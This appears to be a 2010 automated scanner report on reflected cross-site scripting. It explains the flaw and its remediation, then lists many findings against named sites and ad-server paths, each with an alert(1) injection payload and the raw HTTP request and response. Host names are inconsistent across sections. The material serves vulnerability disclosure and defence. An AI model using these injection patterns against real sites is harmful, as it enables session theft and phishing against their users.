Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba90b"><script>alert(1)</script>399f5ca35a6 was submitted in the REST URL parameter 1. This input was echoed as ba90b\"><script>alert(1)</script>399f5ca35a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Styleba90b"><script>alert(1)</script>399f5ca35a6/Examples/011/firstcss.htm HTTP/1.1
Host: 1c-bible.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:44:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://1c-bible.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 22:44:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20244
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/Styleba90b\"><script>alert(1)</script>399f5ca35a6/Examples/011/firstcss.htm" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 900a9"><script>alert(1)</script>a0ee9672307 was submitted in the REST URL parameter 2. This input was echoed as 900a9\"><script>alert(1)</script>a0ee9672307 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Style/Examples900a9"><script>alert(1)</script>a0ee9672307/011/firstcss.htm HTTP/1.1
Host: 1c-bible.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:44:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://1c-bible.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 22:44:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20304
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/Style/Examples900a9\"><script>alert(1)</script>a0ee9672307/011/firstcss.htm" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9707c"><script>alert(1)</script>83b5b1325cf was submitted in the REST URL parameter 3. This input was echoed as 9707c\"><script>alert(1)</script>83b5b1325cf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Style/Examples/0119707c"><script>alert(1)</script>83b5b1325cf/firstcss.htm HTTP/1.1
Host: 1c-bible.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:44:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://1c-bible.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 22:44:48 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20284
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/Style/Examples/0119707c\"><script>alert(1)</script>83b5b1325cf/firstcss.htm" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0f95"><script>alert(1)</script>9a6842d9882 was submitted in the REST URL parameter 4. This input was echoed as c0f95\"><script>alert(1)</script>9a6842d9882 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Style/Examples/011/firstcss.htmc0f95"><script>alert(1)</script>9a6842d9882 HTTP/1.1
Host: 1c-bible.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:44:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://1c-bible.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 22:44:51 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/Style/Examples/011/firstcss.htmc0f95\"><script>alert(1)</script>9a6842d9882" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bb1d"><script>alert(1)</script>6d3d1243481 was submitted in the REST URL parameter 1. This input was echoed as 6bb1d\"><script>alert(1)</script>6d3d1243481 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /TR6bb1d"><script>alert(1)</script>6d3d1243481/NOTE-datetime.html HTTP/1.1
Host: 1c-bible.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:44:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://1c-bible.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 22:44:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20231
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/TR6bb1d\"><script>alert(1)</script>6d3d1243481/NOTE-datetime.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6256"><script>alert(1)</script>2998f915a26 was submitted in the REST URL parameter 2. This input was echoed as c6256\"><script>alert(1)</script>2998f915a26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /TR/NOTE-datetime.htmlc6256"><script>alert(1)</script>2998f915a26 HTTP/1.1
Host: 1c-bible.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:44:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://1c-bible.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 22:44:42 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/TR/NOTE-datetime.htmlc6256\"><script>alert(1)</script>2998f915a26" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31867"><script>alert(1)</script>4b249a12222 was submitted in the REST URL parameter 1. This input was echoed as 31867\"><script>alert(1)</script>4b249a12222 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /XML31867"><script>alert(1)</script>4b249a12222/1999/XML-in-10-points.html HTTP/1.1
Host: 1c-bible.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:44:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://1c-bible.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 22:44:40 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19995
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/XML31867\"><script>alert(1)</script>4b249a12222/1999/XML-in-10-points.html" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81e6d"><script>alert(1)</script>2c50f42130c was submitted in the REST URL parameter 2. This input was echoed as 81e6d\"><script>alert(1)</script>2c50f42130c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /XML/199981e6d"><script>alert(1)</script>2c50f42130c/XML-in-10-points.html HTTP/1.1
Host: 1c-bible.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:44:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://1c-bible.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 22:44:43 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19956
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/XML/199981e6d\"><script>alert(1)</script>2c50f42130c/XML-in-10-points.html" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74b45"><script>alert(1)</script>45d23ad5054 was submitted in the REST URL parameter 3. This input was echoed as 74b45\"><script>alert(1)</script>45d23ad5054 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /XML/1999/XML-in-10-points.html74b45"><script>alert(1)</script>45d23ad5054 HTTP/1.1
Host: 1c-bible.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 22:44:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
X-Pingback: http://1c-bible.ru/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 22:44:47 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19980
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="ru-RU"> <head pro ...[SNIP]... <input type="hidden" name="redirect_to" value="/XML/1999/XML-in-10-points.html74b45\"><script>alert(1)</script>45d23ad5054" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff504"><script>alert(1)</script>51db95ae606 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /actaff504"><script>alert(1)</script>51db95ae606/compare HTTP/1.1
Host: action.ffii.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c93b"><script>alert(1)</script>392b2a79c7b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /acta/compare4c93b"><script>alert(1)</script>392b2a79c7b?action=diff&rev2=3&rev1=1 HTTP/1.1
Host: action.ffii.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 22:41:13 GMT
Server: Apache/2.2.3 (Debian) mod_auth_pgsql/2.0.3 PHP/5.2.0-8+etch16 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_wsgi/2.3 Python/2.4.4 mod_perl/2.0.2 Perl/v5.8.8
Vary: Cookie,User-Agent,Accept-Language
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> <meta name="robots" content= ...[SNIP]... <a href="https://action.ffii.org/acta/compare4c93b"><script>alert(1)</script>392b2a79c7b?action=login" id="login" rel="nofollow"> ...[SNIP]...
1.12. http://ad-g.vulnerable.ad.partner/adi/com.ythome/_default [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad-g.doubleclick.net
Path: /adi/com.ythome/_default
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc762"style%3d"x%3aexpression(alert(1))"4e4dcd5c97b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc762"style="x:expression(alert(1))"4e4dcd5c97b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/com.ythome/_default?fc762"style%3d"x%3aexpression(alert(1))"4e4dcd5c97b=1 HTTP/1.1
Host: ad-g.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 454
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.vulnerable.ad.partner; expires=Mon, 15 Nov 2010 22:59:32 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:44:32 GMT
Expires: Mon, 15 Nov 2010 22:44:32 GMT
Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad-g.vulnerable.ad.partner/click;h=v8/3a53/0/0/%2a/y;44306;0-0;0;18708550;4307-300/250;0/0/0;;~okv=;fc762"style="x:expression(alert(1))"4e4dcd5c97b=1;~aopt=2/0/cab5/0;~sscs=%3f"> ...[SNIP]...
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a379e"style%3d"x%3aexpression(alert(1))"7d45e6dd180 was submitted in the sz parameter. This input was echoed as a379e"style="x:expression(alert(1))"7d45e6dd180 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/com.ythome/_default;sz=a379e"style%3d"x%3aexpression(alert(1))"7d45e6dd180 HTTP/1.1
Host: ad-g.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 455
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.vulnerable.ad.partner; expires=Mon, 15 Nov 2010 22:59:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:44:34 GMT
Expires: Mon, 15 Nov 2010 22:44:34 GMT
Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad-g.vulnerable.ad.partner/click;h=v8/3a53/0/0/%2a/y;44306;0-0;0;18708550;4307-300/250;0/0/0;;~okv=;sz=a379e"style="x:expression(alert(1))"7d45e6dd180;~aopt=2/0/cab5/0;~sscs=%3f"> ...[SNIP]...
1.14. http://ad.vulnerable.ad.partner/adj/ostg.slashdot/mainpage_p33_powerswitch [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/ostg.slashdot/mainpage_p33_powerswitch
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2ddb'-alert(1)-'e19697e144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/mainpage_p33_powerswitch?b2ddb'-alert(1)-'e19697e144=1 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 321
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:44:33 GMT
Expires: Mon, 15 Nov 2010 22:44:33 GMT
Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bb49'%3balert(1)//5a716dffc22 was submitted in the pg parameter. This input was echoed as 8bb49';alert(1)//5a716dffc22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/mainpage_p33_powerswitch;pg=index2;logged_in=0;tile=8bb49'%3balert(1)//5a716dffc22 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 347
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:44:33 GMT
Expires: Mon, 15 Nov 2010 22:44:33 GMT
Connection: close
1.16. http://ad.vulnerable.ad.partner/adj/ostg.slashdot/pg_index_p31_lower_poll_spons [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/ostg.slashdot/pg_index_p31_lower_poll_spons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28832'-alert(1)-'39ba68b3ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/pg_index_p31_lower_poll_spons?28832'-alert(1)-'39ba68b3ce=1 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 461
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:44:33 GMT
Expires: Mon, 15 Nov 2010 22:44:33 GMT
Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a51e4'%3balert(1)//812492194e2 was submitted in the pg parameter. This input was echoed as a51e4';alert(1)//812492194e2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/pg_index_p31_lower_poll_spons;pg=index;logged_in=0;tile=a51e4'%3balert(1)//812492194e2 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 486
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:44:33 GMT
Expires: Mon, 15 Nov 2010 22:44:33 GMT
Connection: close
1.18. http://ad.vulnerable.ad.partner/adj/ostg.slashdot/pg_search_none_pg_search_none_n19_search_top [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9d4c'%3balert(1)//899dc5589c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e9d4c';alert(1)//899dc5589c2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/pg_search_none_pg_search_none_n19_search_top;pg=search;logged_in=0;dcopt=ist;tile=&e9d4c'%3balert(1)//899dc5589c2=1 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 360
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:44:41 GMT
Expires: Mon, 15 Nov 2010 22:44:41 GMT
Connection: close
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7bc0'%3balert(1)//8195cbfb545 was submitted in the pg parameter. This input was echoed as c7bc0';alert(1)//8195cbfb545 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/pg_search_none_pg_search_none_n19_search_top;pg=search;logged_in=0;dcopt=ist;tile=c7bc0'%3balert(1)//8195cbfb545 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 357
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 15 Nov 2010 22:44:41 GMT
Expires: Mon, 15 Nov 2010 22:44:41 GMT
Connection: close
1.20. http://ad.vulnerable.ad.partner/adj/ostg.slashdot/polls_p1_leader [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ad.vulnerable.ad.partner
Path: /adj/ostg.slashdot/polls_p1_leader
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee523'%3balert(1)//83e6f3379d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee523';alert(1)//83e6f3379d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.slashdot/polls_p1_leader;pg=pollBooth;logged_in=0;dcopt=ist;tile=&ee523'%3balert(1)//83e6f3379d6=1 HTTP/1.1
Host: ad.vulnerable.ad.partner
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;
Response
